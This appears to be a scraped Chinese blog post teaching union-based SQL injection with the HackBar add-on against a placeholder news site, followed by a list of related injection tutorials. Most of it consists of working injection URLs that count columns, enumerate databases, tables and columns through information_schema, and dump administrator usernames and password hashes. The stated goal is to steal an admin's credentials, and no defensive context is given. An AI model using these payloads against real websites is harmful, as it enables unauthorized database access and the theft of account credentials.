2. 程式人生 > >利用hackbar進行sql注入簡單例項

利用hackbar進行sql注入簡單例項

阿新 發佈:2019-02-20

這個簡單的例項是對一個網址進行sql注入,獲得管理員的賬號和密碼

步驟如下:
(1)先猜解當前網頁的欄位數
在hackbar的輸入框中輸入:
http://www.xxx/news_detail.php?id=186 order by 7
頁面顯示正常,輸入
http://www.xxx/news_detail.php?id=186 order by 8
頁面報錯,說明欄位數為7.

(2)獲取資料庫的基本資訊
輸入
http://www.xxx/news_detail.php?id=186 union select 1,2,3,4,5,6,7
注意看頁面顯示的數字的位置,當我們對那個數字位置進行函式替換的時候才知道那個位置的資訊是什麼,比如頁面顯示是“使用者名稱:1”那麼當執行
http://www.xxx/news_detail.php?id=186 union select database(),2,3,4,5,6,7


時,頁面顯示是“使用者名稱:admin_db”那麼這個admin_db就是database()的值。
現在想要獲得當前資料庫,使用者名稱和所有資料庫,執行
http://www.xxx/news_detail.php?id=186 union select 1,database(),concat(user()),group_concat(distinct+ table_schema,0x20),5,6,7
+from information_schema.tables
得到database()值為test_db,user()值為admin,所有的庫為:text_db,text2_db,text3_db,information_schema

(3)根據資料庫爆全部的資料表
http://www.xxx/news_detail.php?id=186 union select 1,database(),3,group_concat(distinct+table_name,0x20),5,6,7
+from information_schema.tables where table_schema=database()
會得到很多表
看到其中有一個叫admin_account的表,猜測這個應該就是儲存管理員資訊的表

(4)根據表爆欄位
http://www.xxx/news_detail.php?id=186 union select 1,database(),3,group_concat(distinct+column_name,0x20),5,6,7
+from information_schema.columns where table_name=0x61646d696e5f6163636f756e74


這裡admin_acccount的hex值是0x61646d696e5f6163636f756e74
主意把要爆的表名轉化為16進位制,可以在http://www.newjson.com/change/hex2str/這個網站輸入表名字串進行轉化。
得到幾個欄位,可以看到其中包括id,username,password

(5)最後就是根據欄位爆出欄位資料
http://www.xxx/news_detail.php?id=186 union select 1,database(),3,group_concat(distinct+id,0x2b,username,0x2b,password,0x2b),
5,6,7 +from admin_account
可以得到好幾條資料
這裡寫圖片描述
從中可以知道管理員的資訊
不過得到的密碼是加密過的,需要解密

相關推薦

利用hackbar進行sql注入簡單例項

這個簡單的例項是對一個網址進行sql注入,獲得管理員的賬號和密碼 步驟如下: (1)先猜解當前網頁的欄位數 在hackbar的輸入框中輸入: http://www.xxx/news_deta

利用X-Forwarded-For進行sql注入

由於系統一般會採用String ip = request.getHeader("X-Forwarded-For");進行獲取ip,然後注入者就可以通過X-Forwarded-For請求頭資訊就行偽造ip,當然了這個ip也可以是一些注入語句,如下X-Forwarded-For:

手工sql注入簡單入門

1、判斷是否可以注入: 數字型: 1.1在引數後面加一個引號',如果頁面報數字number錯誤,則一定不是sql注入點;如果報資料庫比如mysql、oracle之類的錯誤,則是一個sql注入點。 1.2 在引數後面加上 依次加上 and 1=1 和 and 1=2,如果加上 and 1=1 還能正常顯示原

[實戰]使用SQLmap進行SQL注入

一、什麼是SQLmap? SQLmap是一款用來檢測與利用SQL注入漏洞的免費開源工具,有一個非常棒的特性,即對檢測與利用的自動化處理(資料庫指紋、訪問底層檔案系統、執行命令)。 備註:SQLmap是python程式碼 二、SQL注入

繞過安全狗進行sql注入(MySQL)

看我如何一步一步繞過安全狗 前言 前幾天滲透了一個站,由於沒有做好善後工作被管理員發現了,再次訪問那個站的時候,管理員已經刪了大馬,裝上了網站安全狗(我估計大馬應該是安全狗刪除的,畢竟那個管理員真的太懶了,我的小馬還在,並且居然菜刀還可以連線),為了給這個管理員增強點安全防護意識

JavaWeb開發sql注入詳細例項講解

一、在資料庫中插入一條使用者記錄 二、用mysql-connector-java-5.1.15-bin.jar連線資料庫。 建立返回資料庫conn連線的類Db package com.mysql.zhang; import java.sql.Connection; import j

對原生php進行sql注入

<?php include 'config.php'; //連線資料庫檔案 $name=$_GET['name']; //接收使用者名稱 $sex=$_GET['sex']; //接收密碼 $sql="select * from stu where name='$name' and

初使用sqlmap對dvwa進行sql注入

1.下載安裝dvwa,可以去此處下載:http://www.dvwa.co.uk/ 2.需要安裝python執行環境,我使用的是python2.7,python2.7-3.0之間的應該都可以。 3.下載sqlmap包並將其解壓 4.直接cmd執行sqlmap,輸入sqlmap.py -h檢視幫助資訊

SQL 注入簡單解釋

例如下面這個查詢語句: select * from table where a=@paramater; 正常情況下,例如paramater可以傳入10,這發到資料庫的語句就變為: select * from table where a=10; 但是如果paramater變成這種格式:

使用dvwa作為靶場,進行SQL注入的練習

SQL注入 所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的SQL命令。具體來說,它是利用現有應用程式,將(惡意的)SQL命令注入到後臺資料庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞

laravel 利用監聽器進行sql語句記錄

利用監聽器進行sql語句記錄 1、監聽sql語句的事件類已經定義,直接建立監聽器類即可: # 監聽sql make:listener QueryListener --event=Illuminate\Database\Events\QueryExecut

SQL注入攻擊例項

一位客戶讓我們針對只有他們企業員工和顧客能使用的企業內網進行滲透測試。這是安全評估的一個部分,所以儘管我們之前沒有使用過SQL注入來滲透網路,但對其概念也相當熟悉了。最後我們在這項任務中大獲成功,現在來回顧一下這個過程的每一步,將它記錄為一個案例。 我們記錄下了在多次

Spring 構造注入簡單例項

如果想要使用spring來實現依賴注入,需要幾個重要的步驟:   1 定義主要的類和需要分離的屬性。   2 配置bean.xml。通過配置檔案,確定主要的類和屬性之間的關係,以及實現類。   3

Burpsuite與sqlmap結合進行sql注入滲透測試

SQL注入漏洞測試網站:http://testasp.vulnweb.com/ 2.分別配置burpsuite的代理和火狐瀏覽器的代理伺服器: 設定burp的proxy--Intercept為Intercept on即擷取資料模式,然後在漏洞測試網站的登入頁面填入使

繞過or1=1進行sql注入

突然想我們是否可以用什麼方法繞過SQL注入的限制呢?到網上考察了一下,提到的方法大多都是針對AND與“’”號和“=”號過濾的突破,雖然有點進步的地方,但還是有一些關鍵字沒有繞過,由於我不常入侵網站所以也不敢對上述過濾的效果進行評論,但是可以肯定的是,效果不會很好…… 經過我

利用Python進行資料分析》 例項:USDA食品資料庫

USDA食品資料庫:from pandas import DataFrame,Series from pylab import * import pandas as pd import json de

利用openssl進行RSA加密解密例項

轉載自:http://www.cnblogs.com/aLittleBitCool/archive/2011/09/22/2185418.html openssl是一個功能強大的工具包,它集成了眾多密碼演算法及實用工具。我們即可以利用它提供的命令臺工具生成金鑰、證書來加

ASP.net防SQL注入(簡單)

一,驗證方法  /// <summary>  ///SQL注入過濾  /// </summary>  /// <param name="InText">要過濾的字串</param>  /// <returns>如果引數存在不安全字元,則返回true

SQL注入的一個簡單例項

<p>很多Web應用程式都使用資料庫來儲存資訊。SQL命令就是前端Web和後端資料庫之間的介面,使得資料可以傳遞至Web應用程式。很多Web站點都會利用使用者輸入的引數動態地生成SQL查詢要求,攻擊者通過在URL、表單域,或者其他的輸入域中輸入自己的

Python3網絡爬蟲(一):利用urllib進行簡單的網頁抓取

robot 資源 urlopen 解碼 支付寶 編碼方式 只需要 服務器 net 一、預備知識 1.Python3.x基礎知識學習: 可以在通過如下方式進行學習: (1)廖雪峰Python3教程(文檔): URL:http://www.liaoxue